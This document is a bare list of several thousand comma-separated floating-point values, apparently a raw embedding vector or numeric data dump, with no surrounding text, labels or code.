-0.006025456357747316, -0.014243362471461296, 0.007991100661456585, 0.010266711935400963, -0.006335423327982426, 0.0017369493143633008, 0.0033982968889176846, -0.011544381268322468, -0.016965024173259735, 0.004188334569334984, -0.010455716401338577, 0.02039734087884426, 0.007696254178881645, 0.020896311849355698, 0.03126886859536171, -0.012171875685453415, -0.01731279119849205, 0.04563319310545921, 0.006252261344343424, -0.0033472657669335604, 0.018099049106240273, -0.00579109089449048, -0.04257888346910477, 0.015755396336317062, -0.010349874384701252, 0.006596249062567949, 0.002404134487733245, -0.011385617777705193, 0.013494905084371567, 0.018461937084794044, 0.01583099737763405, 0.04566343128681183, 0.004305517300963402, -0.00956361647695303, 0.016632376238703728, 0.006603809539228678, -0.024676397442817688, 0.00627116160467267, 0.03078501671552658, -0.0029333464335650206, -0.0040862723253667355, 0.02045782282948494, -0.012035791762173176, -0.006607589311897755, -0.0056096469052135944, -0.01726743020117283, 0.02200009673833847, 0.016072923317551613, 0.009646777994930744, -0.011468779295682907, 0.02060902677476406, -0.008081822656095028, -0.000006508096248580841, -0.02221178263425827, 0.0004640054830815643, -0.0171011071652174, -0.00991138443350792, 0.011113451793789864, 0.0055794063955545425, 0.011604862287640572, -0.016435811296105385, -0.02440423145890236, 0.013804872520267963, -0.003277334151789546, 0.01353270560503006, -0.003317025024443865, 0.005745729897171259, -0.0025250972248613834, 0.006014116108417511, 0.025024166330695152, 0.018099049106240273, 0.011839227750897408, 0.012950573116540909, -0.008701756596565247, -0.003220632905140519, -0.021879134699702263, -0.0010196780785918236, 0.0029711471870541573, -0.0041467538103461266, 0.006751232780516148, -0.006051917094737291, 0.0005381896626204252, -0.004872530233114958, -0.0072313034906983376, -0.0029125558212399483, -0.009223408997058868, -0.006720991805195808, -0.0007234138902276754, 0.017494235187768936, -0.004400019533932209, 0.004959471989423037, 0.012300398200750351, 0.014213121496140957, -0.010750562883913517, -0.0021754391491413116, -0.0006945907371118665, 0.00015829107724130154, 0.014046797528862953, 0.022756114602088928, -0.006550888065248728, 0.03544208034873009, -0.00667185103520751, 0.011075650341808796, 0.007692473940551281, 0.017282551154494286, -0.014175320975482464, -0.005397961940616369, -0.021274320781230927, 0.020654387772083282, -0.012398680672049522, 0.0057343896478414536, -0.0029843775555491447, 0.0004890485433861613, -0.0017397843766957521, -0.018794585019350052, -0.021909374743700027, 0.01220211572945118, -0.002825613832101226, -0.007533710449934006, -0.012799369171261787, -0.006002775859087706, 0.0014742333441972733, -0.0018909877398982644, 0.023633094504475594, 0.0061501991003751755, 0.005870472639799118, 0.008686636574566364, 0.008769798092544079, 0.006112398114055395, -0.007046079263091087, -0.018628261983394623, 0.012504522688686848, 0.017932726070284843, 0.014833055436611176, -0.005254318937659264, 0.024631036445498466, 0.03302282840013504, 0.018068809062242508, -0.004993492737412453, -0.01608804427087307, 0.011544381268322468, -0.011279774829745293, 0.01938427798449993, -0.0012294728076085448, -0.01885506696999073, -0.006104838103055954, 0.011733385734260082, -0.022982919588685036, -0.00011476103099994361, -0.0002735836897045374, 0.01811417005956173, 0.014243362471461296, -0.011922389268875122, -0.007726494688540697, -0.016435811296105385, 0.0014421025989577174, -0.01470453292131424, 0.010780803859233856, 0.0024305949918925762, 0.0065357680432498455, -0.004044691566377878, -0.016526533290743828, 0.00995674543082714, 0.004161874298006296, -0.0029125558212399483, 0.009223408997058868, -0.003972869832068682, -0.004687306005507708, -0.010690081864595413, -0.008164985105395317, -0.0060594771057367325, -0.013940955512225628, -0.004324418026953936, -0.0013778411084786057, 0.018688742071390152, -0.0075299302116036415, 0.014568449929356575, -0.022347865626215935, 0.012504522688686848, -0.021440645679831505, 0.0028218338266015053, 0.031026942655444145, 0.0060330163687467575, -0.016420692205429077, -0.00542064243927598, -0.027201496064662933, -0.007696254178881645, 0.019701804965734482, -0.0008656395948491991, -0.002787813078612089, -0.007786976173520088, -0.0178420040756464, -0.012421361170709133, 0.026596682146191597, 0.006830614525824785, -0.000001794064019122743, -0.015188383869826794, 0.029227621853351593, -0.0001272235094802454, -0.001813495997339487, 0.002693310845643282, 0.027337579056620598, 0.0091856075450778, 0.020442701876163483, 0.003702593734487891, 0.010743003338575363, 0.006082157604396343, -0.029877794906497, -0.020518304780125618, -0.002445715246722102, -0.0056701283901929855, 0.022620031610131264, -0.010349874384701252, 0.011619983240962029, 0.00006195796595420688, -0.013003493659198284, -0.0019769847858697176, -0.007862578146159649, 0.013963636010885239, 0.015483230352401733, -0.019414519891142845, -0.00480826897546649, -0.0016018112655729055, -0.01030451338738203, 0.018129289150238037, -0.021531367674469948, -0.020472943782806396, -0.0067172120325267315, 0.0038311167154461145, 0.015513471327722073, -0.010606920346617699, -0.007386287208646536, -0.012368439696729183, -0.01084128487855196, -0.02472175844013691, 0.005122015718370676, -0.0006856130203232169, 0.01326810009777546, -0.004158094059675932, 0.020276378840208054, -0.021244080737233162, -0.010100388899445534, -0.012791809625923634, 0.0012247477425262332, 0.01220211572945118, 0.0031336909160017967, -0.026778126135468483, -0.015513471327722073, 0.001487463596276939, -0.01997397094964981, 0.006792813539505005, 0.010531318373978138, -0.00392750883474946, -0.0038556871004402637, 0.0021848895121365786, -0.007382506970316172, -0.0012502633035182953, -0.03278090059757233, 0.019096991047263145, 0.01929355598986149, -0.0045890239998698235, -0.0028501844499260187, 0.006429925560951233, 0.0006733277114108205, 0.010773243382573128, 0.002670630346983671, 0.011158812791109085, 0.00825570710003376, 0.013056415133178234, 0.03311355039477348, 0.012814490124583244, 0.01864338107407093, 0.0085505535826087, 0.010977367870509624, 0.008414470590651035, 0.001340040354989469, 0.0036062016151845455, -0.009601416997611523, -0.00029815424932166934, 0.001961864298209548, -0.008641275577247143, 0.011415857821702957, -0.01577051728963852, 0.00394262932240963, 0.013177378103137016, -0.016965024173259735, 0.006826834287494421, 0.01496913842856884, 0.0028180538211017847, 0.020200777798891068, -0.006116178352385759, 0.00783233717083931, 0.022786354646086693, -0.012081153690814972, -0.014220681972801685, -0.013328581117093563, -0.009389732033014297, 0.007121681235730648, 0.019777407869696617, 0.005038853734731674, -0.01192994974553585, 0.015573952347040176, 0.0018087709322571754, 0.0037611851003021, 0.00407493207603693, 0.0008850125013850629, 0.010622040368616581, 0.0335671603679657, -0.0037574050948023796, 0.016980143263936043, -0.006407245062291622, 0.0021319682709872723, 0.004929231479763985, -0.01566467434167862, -0.009419973008334637, -0.016662616282701492, -0.022771235555410385, 0.0017454545013606548, 0.0020110055338591337, -0.003744174726307392, -0.005254318937659264, -0.009019283577799797, -0.0013249199837446213, -0.015150582417845726, -0.00652442779392004, -0.00001163557590189157, -0.00825570710003376, -0.004415140021592379, 0.00330946478061378, -0.006161539349704981, 0.019474999979138374, -0.007201062981039286, -0.010750562883913517, -0.04620776325464249, -0.009684579446911812, 0.01332102157175541, -0.0048309494741261005, 0.00790793914347887, -0.0020752670243382454, 0.0010017226450145245, -0.01331346109509468, 0.009601416997611523, -0.004815828986465931, 0.02370869554579258, -0.01581587828695774, 0.012784249149262905, 0.003636442357674241, -0.0164660532027483, 0.029530027881264687, -0.0008491016924381256, -0.005855352617800236, -0.012633046135306358, -0.006558448541909456, 0.024253029376268387, 0.0028993256855756044, -0.023905260488390923, 0.011778746731579304, -0.012081153690814972, -0.017660560086369514, 0.011975310742855072, -0.002750012092292309, -0.024752000346779823, 0.011143691837787628, -0.01163510326296091, -0.005560505669564009, -0.011778746731579304, -0.0225897915661335, 0.007817217148840427, 0.023829659447073936, 0.008459831587970257, 0.03855687379837036, -0.005314800422638655, -0.000022961066861171275, 0.0013211398618295789, 0.007378726731985807, -0.02615819126367569, -0.025961626321077347, -0.0015791307669132948, 0.03789157792925835, 0.0013457104796543717, -0.014190440997481346, -0.007306905463337898, 0.01121173333376646, 0.0013835112331435084, -0.0014628930948674679, 0.01047083642333746, -0.026188433170318604, 0.01502205990254879, -0.008943682536482811, 0.015861239284276962, -0.010244031436741352, 0.010002106428146362, -0.0003487128997221589, -0.015067420899868011, -0.011098330840468407, -0.002653619972988963, 0.003802766092121601, -0.019142352044582367, -0.010387674905359745, 0.013797312043607235, 0.023693576455116272, 0.018235132098197937, 0.02216642163693905, 0.02206057868897915, -0.004252596292644739, -0.015279105864465237, -0.018416576087474823, -0.011196613311767578, 0.001329645048826933, 0.01885506696999073, 0.047538354992866516, 0.0011519810650497675, 0.006758792791515589, -0.010244031436741352, 0.004728886764496565, 0.006615149788558483, 0.004728886764496565, 0.007185942493379116, 0.005171156954020262, -0.0019108331762254238, 0.0024967463687062263, 0.021425524726510048, 0.014659171923995018, -0.0015895259566605091, 0.0032414232846349478, 0.003916168585419655, 0.02125920169055462, -0.026823487132787704, 0.001255933428183198, 0.007306905463337898, -0.0014600580325350165, 0.0060065556317567825, -0.007246423978358507, -0.0230131596326828, 0.0036232119891792536, -0.001529989647679031, 0.009200728498399258, -0.0007550721056759357, 0.0018484618049114943, -0.010312072932720184, -0.0014430476585403085, 0.012738888151943684, 0.014749893918633461, 0.009034404531121254, -0.0023474330082535744, 0.020110053941607475, 0.01731279119849205, 0.017978087067604065, -0.02295267954468727, -0.005477343685925007, -0.03607713431119919, 0.008376669138669968, 0.019081871956586838, 0.008747117593884468, -0.005163596943020821, 0.0057532899081707, 0.013373942114412785, -0.0041467538103461266, 0.004914110992103815, 0.002819943707436323, 0.002734891837462783, -0.01672309823334217, 0.009019283577799797, -0.0029314563143998384, 0.005231638438999653, -0.017721040174365044, 0.017433755099773407, -0.012769129127264023, -0.011846788227558136, 0.00367613323032856, 0.01406191848218441, -0.0068079340271651745, 0.0028501844499260187, 0.0018957129213958979, 0.004778028000146151, -0.026914209127426147, -0.0029976076912134886, 0.012020671740174294, -0.007371166720986366, -0.004796928260475397, 0.018673622980713844, 0.012655726633965969, -0.00440757954493165, -0.0014080818509683013, -0.011279774829745293, -0.007053639739751816, 0.010788364335894585, -0.004441600292921066, -0.0007413692655973136, 0.0070196189917624, -0.008852960541844368, 0.01746399514377117, 0.00615397933870554, 0.005908273626118898, -0.010433035902678967, -0.01528666540980339, 0.005356381181627512, 0.0009213958401232958, 0.012587685137987137, 0.025175370275974274, 0.02183377370238304, -0.018613141030073166, 0.002018565544858575, -0.007900378666818142, 0.001472343341447413, -0.016345089301466942, -0.031147904694080353, -0.01491621695458889, 0.002570458222180605, -0.01196019072085619, 0.0022510408889502287, 0.018522419035434723, 0.000819806067738682, -0.007488349452614784, 0.0004394349525682628, -0.01332102157175541, -0.029046177864074707, 0.01619388535618782, -0.00266307033598423, -0.0033132450189441442, -0.024358870461583138, -0.010425475426018238, -0.001339095295406878, -0.015785636380314827, 0.004887650720775127, 0.015422748401761055, 0.0023096322547644377, -0.009646777994930744, -0.004933011718094349, 0.012368439696729183, -0.01661725528538227, 0.024253029376268387, 0.03099670074880123, 0.014182880520820618, -0.008973922580480576, 0.004842289723455906, 0.003727164352312684, 0.0076206522062420845, 0.0021640988998115063, -0.021879134699702263, -0.003128020791336894, 0.028108716011047363, 0.004003110341727734, 0.001495968783274293, -0.005360161419957876, -0.019777407869696617, -0.0051673767156898975, 0.020215896889567375, 0.014258482493460178, 0.0060594771057367325, 0.000031392428354592994, -0.003349155653268099, 0.03154103457927704, 0.0023171924985945225, -0.01938427798449993, -0.014409685507416725, -0.015906600281596184, 0.012466722168028355, 0.01587635837495327, 0.0024608357343822718, 0.007692473940551281, 0.008663956075906754, 0.005757070146501064, 0.00023613721714355052, 0.013918275013566017, -0.009767740964889526, -0.01747911609709263, -0.011839227750897408, -0.007442988455295563, 0.008883200585842133, 0.004241256043314934, 0.0217430517077446, -0.03402077034115791, 0.0030807696748524904, 0.0008557168766856194, -0.006588689051568508, -0.021758172661066055, -0.005261878948658705, 0.002337982878088951, -0.005522704683244228, 0.004029571078717709, -0.01714646816253662, -0.02125920169055462, -0.014757453463971615, -0.004347098525613546, 0.009382172487676144, 0.019883248955011368, -0.006475286558270454, 0.006441265810281038, -0.015400067903101444, -0.004384899046272039, -0.010508637875318527, -0.019898369908332825, -0.009714819490909576, -0.00919316802173853, -0.006683191284537315, 0.025855785235762596, -0.008943682536482811, -0.024373991414904594, -0.021289441734552383, -0.0010451936395838857, 0.0048347292467951775, 0.0001220258855028078, -0.010780803859233856, -0.015082540921866894, -0.022015217691659927, -0.014417245984077454, 0.006131298840045929, -0.0013154697371646762, -0.021289441734552383, 0.03601665422320366, -0.0007763350731693208, 0.004486961290240288, 0.015846118330955505, -0.0032470934092998505, -0.017600078135728836, 0.0238598994910717, 0.0030391886830329895, -0.007102780509740114, -0.0084447106346488, -0.031026942655444145, -0.019096991047263145, 0.007431648205965757, -0.005912053864449263, -0.02162208966910839, -0.007227523252367973, 0.018189771100878716, -0.01961108297109604, -0.007185942493379116, -0.015997322276234627, 0.005250538699328899, 0.011514140293002129, 0.026112830266356468, -0.015679795295000076, 0.003608091501519084, 0.0027141014579683542, 0.005723049398511648, -0.02573482133448124, -0.017433755099773407, -0.007072540000081062, -0.022393226623535156, 0.006747452542185783, -0.006070817355066538, -0.004335758276283741, -0.02071486786007881, 0.023481890559196472, 0.0022982920054346323, -0.015377387404441833, 0.013510025106370449, 0.00593851413577795, -0.007219963241368532, 0.006516867317259312, 0.015483230352401733, -0.0034323176369071007, -0.006108618341386318, 0.011355376802384853, 0.003649672493338585, 0.00749968970194459, -0.013827553018927574, -0.0031544812954962254, -0.003976650070399046, -0.01923307590186596, -0.021380163729190826, -0.03211560472846031, -0.004426480270922184, -0.01166534423828125, 0.004294177051633596, 0.006581129040569067, 0.00647150631994009, 0.010659840889275074, -0.0026725204661488533, 0.005046414211392403, 0.017766401171684265, 0.007427867967635393, -0.006169099360704422, 0.024903202429413795, 0.01230795867741108, -0.011400737799704075, -0.010410355404019356, 0.011272215284407139, -0.03031628578901291, 0.006694531533867121, -0.006845735013484955, -0.012784249149262905, 0.006463946308940649, -0.025538258254528046, -0.004154313821345568, 0.003953969571739435, 0.008588354103267193, 0.018688742071390152, -0.022302504628896713, -0.007072540000081062, -0.0022151300217956305, -0.01880970597267151, 0.014281162992119789, 0.023058520630002022, 0.0009091105894185603, 0.02599186822772026, -0.008709317073225975, -0.010659840889275074, -0.004936791490763426, 0.01613340526819229, 0.03450462222099304, -0.002162209013476968, -0.029696350917220116, 0.019943730905652046, -0.02641523815691471, 0.021758172661066055, 0.009125126525759697, 0.0024438253603875637, 0.001038578455336392, -0.007431648205965757, 0.0010329083306714892, -0.0025232071056962013, 0.004449160769581795, -0.013578067533671856, 0.0003487128997221589, 0.005386621691286564, -0.006959137506783009, 0.0005046413862146437, 0.024963684380054474, 0.007303125225007534, 0.01971692591905594, 0.009835782460868359, 0.003152591409161687, 0.005541605409234762, 0.011249534785747528, 0.00827838759869337, -0.01158974226564169, 0.011695584282279015, -0.014954018406569958, -0.005881812889128923, -0.007129241246730089, -0.007824776694178581, -0.005280779208987951, 0.008603474125266075, -0.0011737165041267872, -0.011083210818469524, 0.0032470934092998505, 0.012769129127264023, 0.013918275013566017, 0.010690081864595413, -0.003460668260231614, 0.03583521023392677, -0.0044605010189116, 0.017176708206534386, 0.007938179187476635, -0.003851907094940543, 0.011884588748216629, -0.00914024654775858, 0.006652950309216976, -0.005995215382426977, 0.005190057214349508, -0.016647497192025185, -0.0020752670243382454, -0.007159481756389141, 0.004449160769581795, -0.01961108297109604, -0.0015403848374262452, -0.02754926308989525, 0.020427582785487175, -0.01720694825053215, -0.005522704683244228, -0.010002106428146362, -0.0016452822601422668, -0.002695200964808464, 0.02402622252702713, -0.03586545214056969, -0.0006827779579907656, -0.01741863414645195, -0.006388344336301088, 0.032418012619018555, 0.011733385734260082, -0.007779416162520647, -0.013396622613072395, 0.004846069496124983, -0.016239246353507042, 0.0031979524064809084, -0.008172544650733471, 0.006388344336301088, 0.0005854407208971679, -0.005454663187265396, -0.02024613879621029, -0.003781975479796529, -0.0010773243848234415, -0.021697690710425377, 0.017781522125005722, 0.020336860790848732, -0.03701459616422653, 0.010901766829192638, 0.01629972830414772, -0.010901766829192638, 0.01619388535618782, -0.01222479622811079, -0.010538877919316292, 0.010637160390615463, 0.0149388974532485, -0.009344371035695076, 0.0027991533279418945, -0.002587468596175313, 0.007749175187200308, 0.0011945070000365376, -0.007390066981315613, -0.014681852422654629, 0.0076206522062420845, 0.00926876999437809, 0.005053974222391844, -0.000016596937712165527, -0.015384947881102562, 0.01961108297109604, -0.02119871973991394, 0.02865304797887802, 0.006044356618076563, 0.032418012619018555, 0.007983540184795856, -0.013373942114412785, -0.0285018440335989, 0.004827169235795736, 0.004449160769581795, -0.003961529582738876, 0.014341644011437893, -0.03014996275305748, -0.0045928037725389, -0.006093497853726149, -0.000831618788652122, -0.0063921245746314526, 0.012980813160538673, -0.009918943978846073, 0.005190057214349508, -0.011143691837787628, -0.006698311306536198, 0.02280147559940815, 0.037317004054784775, -0.013336141593754292, -0.011340256780385971, 0.02178841270506382, 0.03831494599580765, 0.015951961278915405, 0.0020261257886886597, -0.01131757628172636, -0.007613092195242643, 0.008119623176753521, -0.009110006503760815, 0.0139333950355649, 0.00007353447290370241, 0.007246423978358507, 0.014628930948674679, -0.015468109399080276, 0.012126514688134193, -0.009843342937529087, -0.015951961278915405, -0.0016197665827348828, -0.010039906948804855, 0.003035408677533269, 0.003708263859152794, 0.00038344241329468787, 0.013464664109051228, 0.005382841918617487, -0.0020431361626833677, -0.016541654244065285, 0.004464280791580677, 0.007061199750751257, 0.003878367831930518, -0.011650223284959793, -0.004917891230434179, 0.009261209517717361, -0.003965309821069241, 0.018023448064923286, 0.021062636747956276, -0.011695584282279015, 0.004464280791580677, 0.009608977474272251, 0.008036461658775806, -0.011604862287640572, 0.011310015805065632, 0.007779416162520647, 0.026294274255633354, -0.015498350374400616, 0.00282939407043159, 0.0063581038266420364, 0.007923059165477753, -0.0034398778807371855, 0.004309297539293766, 0.03253897652029991, -0.0008887926233001053, -0.005624767392873764, -0.0006700201774947345, 0.006403464823961258, -0.001639612135477364, 0.0293485838919878, 0.0053110201843082905, -0.01906675100326538, -0.0019448540406301618, 0.004241256043314934, 0.010017226450145245, 0.01227771770209074, -0.020155414938926697, -0.004664625506848097, -0.002770802704617381, 0.013600748032331467, 0.00785501766949892, -0.027927272021770477, -0.0168894212692976, 0.008663956075906754, -0.004320637788623571, -0.004944351967424154, 0.0000010742235190264182, -0.011529260315001011, 0.009737499989569187, 0.003901048330590129, 0.0016736328834667802, -0.0008264211937785149, -0.006649170536547899, 0.006747452542185783, 0.007616872433573008, 0.005632327403873205, -0.00914024654775858, -0.00914024654775858, -0.007991100661456585, 0.02172793075442314, -0.0032244129106402397, -0.00923852901905775, -0.002186779398471117, -0.01938427798449993, -0.012882531620562077, -0.015573952347040176, -0.008822719566524029, 0.007027179002761841, 0.0070801000110805035, 0.025870904326438904, -0.011158812791109085, 0.018567780032753944, -0.015634434297680855, 0.02147088572382927, -0.007545050699263811, -0.027715586125850677, 0.008671516552567482, -0.0032300830353051424, 0.019323797896504402, 0.0007508194539695978, -0.005972534883767366, -0.012474281713366508, 0.02284683659672737, 0.00009993601270252839, -0.017887365072965622, 0.012285278178751469, -0.003702593734487891, 0.013389063067734241, 0.006562228314578533, 0.023315567523241043, 0.01465161144733429, 0.0028728649485856295, 0.013797312043607235, -0.008157424628734589, -0.004426480270922184, 0.002188669517636299, 0.01811417005956173, -0.016753338277339935, -0.00019727321341633797, -0.011710705235600471, 0.008134744130074978, -0.013132017105817795, 0.0033132450189441442, 0.019354037940502167, -0.006445045582950115, -0.023481890559196472, -0.022332744672894478, 0.00027169365785084665, 0.0091856075450778, -0.014016556553542614, 0.04342562332749367, -0.0047704679891467094, 0.007193502504378557, 0.004664625506848097, 0.005322360433638096, 0.010191110894083977, 0.0112419743090868, -0.010803484357893467, -0.0009506915230304003, 0.006694531533867121, -0.014825494959950447, -0.0048952107317745686, -0.024812480434775352, -0.004713766742497683, -0.008777358569204807, 0.027836550027132034, 0.01655677519738674, 0.011725825257599354, -0.013094216585159302, -0.0232248455286026, -0.005730609409511089, -0.01725231111049652, -0.0042374758049845695, 0.0038859278429299593, 0.01655677519738674, 0.004093832802027464, -0.008210346102714539, 0.002770802704617381, 0.002288841875270009, 0.01731279119849205, 0.00031351082725450397, -0.007730274926871061, -0.0054660034365952015, -0.00700449850410223, 0.011733385734260082, 0.007975980639457703, 0.0004332922981120646, 0.025553377345204353, 0.020805589854717255, -0.019535481929779053, 0.015725156292319298, -0.024116944521665573, -0.005356381181627512, 0.00624848110601306, -0.01608804427087307, -0.005700368899852037, 0.007091440260410309, -0.03004411980509758, 0.031238626688718796, 0.011325135827064514, -0.011022728867828846, 0.005379061680287123, -0.014455046504735947, 0.002419254742562771, -0.008316188119351864, -0.0009284834959544241, -0.002018565544858575, 0.017282551154494286, -0.014772574417293072, -0.021183598786592484, 0.005171156954020262, 0.023421410471200943, 0.019323797896504402, 0.009896263480186462, -0.01505230087786913, 0.019323797896504402, 0.015649553388357162, -0.002320972504094243, 0.0024173646233975887, -0.0012152974959462881, -0.009034404531121254, 0.022408347576856613, -0.009767740964889526, 0.015400067903101444, 0.009661898948252201, -0.007945739664137363, 0.0028104935772717, 0.013434424065053463, 0.00289554544724524, 0.008051581680774689, 0.009374612011015415, -0.035502564162015915, 0.004762907512485981, 0.0051938374526798725, -0.010062587447464466, -0.0003711571334861219, -0.013396622613072395, -0.007613092195242643, 0.008104503154754639, -0.0013504355447366834, 0.005462223663926125, 0.014152640476822853, -0.01608804427087307, -0.02147088572382927, -0.018340975046157837, 0.016269488260149956, -0.010705201886594296, -0.015891479328274727, 0.008966363035142422, 0.0028048234526067972, 0.006290062330663204, -0.016375331208109856, -0.002162209013476968, 0.001404301729053259, 0.0027405619621276855, 0.004324418026953936, 0.014802814461290836, 0.0017076536314561963, 0.010168430395424366, -0.013736831024289131, 0.00982822198420763, 0.03190392255783081, -0.019142352044582367, -0.012776688672602177, 0.001978874672204256, -0.0028558545745909214, -0.010387674905359745, -0.01081860437989235, 0.007201062981039286, 0.016692858189344406, -0.01593684032559395, 0.010357433930039406, -0.007991100661456585, -0.007110340986400843, 0.014492847956717014, 0.009775301441550255, 0.007688693702220917, 0.019777407869696617, 0.006146418862044811, -0.010856405831873417, -0.006751232780516148, 0.01661725528538227, 0.000059359153965488076, 0.0034360976424068213, 0.0008599694701842964, -0.013411743566393852, 0.013910714536905289, -0.0024419352412223816, 0.0061501991003751755, 0.019112112000584602, -0.006437485571950674, -0.008399349637329578, -0.00196375441737473, -0.007272884715348482, -0.006388344336301088, 0.006165319588035345, 0.007057419512420893, 0.005038853734731674, 0.010191110894083977, 0.010372554883360863, -0.01054643839597702, -0.004320637788623571, 0.011105891317129135, 0.010637160390615463, -0.0007583796395920217, -0.010387674905359745, 0.0163602102547884, 0.0058251116424798965, -0.0033718361519277096, -0.0066907512955367565, 0.007291784975677729, 0.010062587447464466, -0.012383559718728065, -0.025175370275974274, -0.004078712314367294, 0.0011585962492972612, -0.011340256780385971, -0.005704149138182402, -0.029484666883945465, 0.03278090059757233, 0.020654387772083282, 0.01363854855298996, -0.017554717138409615, 0.001986434916034341, 0.00021251168800517917, 0.004452940542250872, 0.008361549116671085, -0.021773291751742363, -0.001414697035215795, -0.0230131596326828, -0.011151252314448357, 0.0008807599078863859, -0.0009445488685742021, 0.00718972273170948, -0.00494057172909379, -0.00696669751778245, -0.010123069398105145, -0.010984928347170353, 0.018038567155599594, 0.03429293632507324, 0.01741863414645195, 0.0030902198050171137, -0.0005325195379555225, 0.0018909877398982644, -0.03734724596142769, -0.0013816212303936481, -0.022877076640725136, 0.038012538105249405, -0.000014337746506498661, -0.018099049106240273, 0.0005329920677468181, 0.00748456921428442, -0.012421361170709133, -0.010795923881232738, -0.0027386718429625034, -0.00497837271541357, 0.014530648477375507, 0.0026744105853140354, -0.0070196189917624, -0.0009327360894531012, 0.010244031436741352, 0.009178047999739647, 0.017600078135728836, 0.0024022443685680628, 0.00007955898763611913, 0.01891554705798626, -0.0003905300691258162, 0.0060330163687467575, -0.002322862623259425, 0.004105173051357269, 0.016012441366910934, -0.0023833438754081726, 0.01859802007675171, -0.006188000086694956, 0.005715489387512207, -0.0216372087597847, 0.005757070146501064, 0.0008382339728996158, 0.013336141593754292, 0.012239917181432247, 0.005526484921574593, -0.025281211361289024, 0.0012398679973557591, -0.006777693517506123, 0.018613141030073166, -0.01593684032559395, -0.020790470764040947, 0.0023323127534240484, -0.00543576292693615, -0.011521700769662857, -0.0036780231166630983, 0.005318580195307732, -0.02584066428244114, -0.0076735736802220345, -0.006021676119416952, 0.005624767392873764, 0.014659171923995018, -0.006218240596354008, 0.013184938579797745, 0.02940906584262848, 0.02408670447766781, 0.0047440072521567345, -0.010856405831873417, 0.01843169704079628, 0.016904542222619057, -0.00009030860383063555, -0.010183550417423248, -0.020896311849355698, -0.01227771770209074, 0.01096980832517147, 0.00886808056384325, -0.0018872077343985438, -0.0005400797235779464, -0.003798985853791237, 0.012285278178751469, 0.008611034601926804, 0.008293507620692253, 0.012822049669921398, 0.01353270560503006, 0.016526533290743828, 0.008512752130627632, -0.012028232216835022, 0.006456385832279921, -0.009661898948252201, -0.013472224585711956, -0.0048952107317745686, 0.010372554883360863, -0.0060065556317567825, 0.04276032745838165, 0.008928561583161354, 0.0010281832655891776, 0.008399349637329578, 0.0176303181797266, -0.006668070796877146, 0.0024476053658872843, 0.005715489387512207, 0.006479066330939531, 0.011279774829745293, 0.017403513193130493, -0.0049216714687645435, -0.018628261983394623, 0.01731279119849205, 0.01752447709441185, 0.015906600281596184, 0.010750562883913517, 0.007514810189604759, -0.03232729062438011, 0.006996938027441502, -0.02392038144171238, 0.02280147559940815, 0.005568066146224737, 0.006252261344343424, -0.003668572986498475, -0.020488062873482704, 0.014485287480056286, 0.05443323031067848, -0.009503134526312351, -0.005893153138458729, -0.015400067903101444, -0.00011907269072253257, 0.0008495742222294211, -0.033536918461322784, 0.017917605116963387, 0.003407747019082308, 0.012874971143901348, 0.006097278092056513, -0.004498301539570093, 0.0027594624552875757, 0.005397961940616369, -0.00029839048511348665, -0.001680247951298952, 0.008490071631968021, 0.0047440072521567345, -0.017070865258574486, -0.003441767767071724, 0.011430978775024414, -0.013041295111179352, 0.017766401171684265, 0.008406910113990307, -0.0007768075447529554, -0.003027848433703184, -0.025281211361289024, -0.0029465765692293644, -0.00923852901905775, 0.009699699468910694, -0.014470167458057404, -0.007427867967635393, -0.01566467434167862, -0.015634434297680855, -0.004611704498529434, 0.00010135354386875406, -0.008663956075906754, -0.0063278633169829845, -0.0022586011327803135, 0.019989091902971268, -0.03498847037553787, -0.0016670176992192864, -0.016118284314870834, -0.0008850125013850629, 0.0012351429322734475, -0.006361884064972401, -0.010735442861914635, -0.0036288821138441563, -0.011514140293002129, 0.012512083165347576, -0.01047083642333746, -0.004301737062633038, -0.013895594514906406, 0.0003142195928376168, 0.007953300140798092, 0.015785636380314827, -0.025477776303887367, -0.0015488900244235992, 0.03855687379837036, 0.004078712314367294, 0.014145080000162125, 0.014341644011437893, -0.0027254417072981596, 0.011249534785747528, 0.00849763210862875, -0.0062409210950136185, -0.017403513193130493, -0.007847457192838192, -0.004226135555654764, -0.007779416162520647, 0.006259821355342865, -0.008081822656095028, -0.00045526406029239297, -0.0029390165582299232, -0.005534044932574034, 0.0011500910622999072, 0.0007701924187131226, -0.010364994406700134, 0.013615868054330349, 0.006490406580269337, 0.0008462666301056743, -0.012935452163219452, 0.011491459794342518, 0.01815953105688095, 0.008943682536482811, -0.00735226646065712, -0.018764344975352287, 0.010115508921444416, -0.01028183288872242, 0.026974689215421677, -0.011226854287087917, -0.028789130970835686, -0.03538160026073456, -0.0011510360054671764, 0.010553998872637749, 0.016329970210790634, -0.019217954948544502, 0.019792526960372925, 0.009472894482314587, -0.015301786363124847, 0.020382221788167953, 0.0025761283468455076, 0.0108715258538723, 0.014417245984077454, -0.010780803859233856, 0.021107997745275497, -0.005250538699328899, 0.007163261994719505, 0.01725231111049652, -0.02508464641869068, -0.012912771664559841, -0.023345807567238808, -0.00924608949571848, 0.00034847663482651114, -0.004441600292921066, -0.004343318287283182, 0.0011444209376350045, -0.03967577591538429, -0.014213121496140957, 0.014976698905229568, 0.011143691837787628, 0.008414470590651035, 0.02738294005393982, 0.000706875987816602, -0.005239198449999094, -0.023209724575281143, 0.004392459522932768, 0.000594890967477113, -0.004490741528570652, -0.011703144758939743, 0.006312742829322815, 0.020442701876163483, 0.006596249062567949, -0.027851669117808342, 0.054523952305316925, 0.014712092466652393, 0.00919316802173853, 0.00006827779725426808, 0.0022756115067750216, 0.01297325361520052, 0.004369779024273157, -0.02136504277586937, -0.009155367501080036, 0.005050194449722767, 0.004365998785942793, -0.021123116835951805, 0.023028280586004257, -0.021803533658385277, -0.002305852249264717, -0.003600531490519643, -0.007461888715624809, 0.0024627256207168102, -0.014810374937951565, -0.018976029008626938, -0.01326810009777546, 0.005004832986742258, 0.017176708206534386, -0.014432366006076336, 0.0002331840223632753, 0.012300398200750351, -0.0016490622656419873, -0.014901096932590008, 0.021077755838632584, -0.008852960541844368, 0.029257861897349358, -0.008996603079140186, -0.004305517300963402, 0.010531318373978138, 0.008671516552567482, 0.010002106428146362, 0.012285278178751469, 0.015679795295000076, -0.00239657424390316, -0.016450932249426842, 0.004649505019187927, 0.008376669138669968, 0.0015668454580008984, 0.008119623176753521, 0.010274272412061691, -0.0018371215555816889, 0.0012512082466855645, -0.007371166720986366, 0.014901096932590008, 0.0009714819607324898, 0.00825570710003376, 0.01976228691637516, -0.012066032737493515, 0.008006220683455467, -0.005110675469040871, -0.01693478226661682, -0.003424757393077016, 0.009283890016376972, -0.0024929663632065058, -0.014742333441972733, 0.0022737213876098394, 0.0038689174689352512, -0.007306905463337898, -0.005556725896894932, 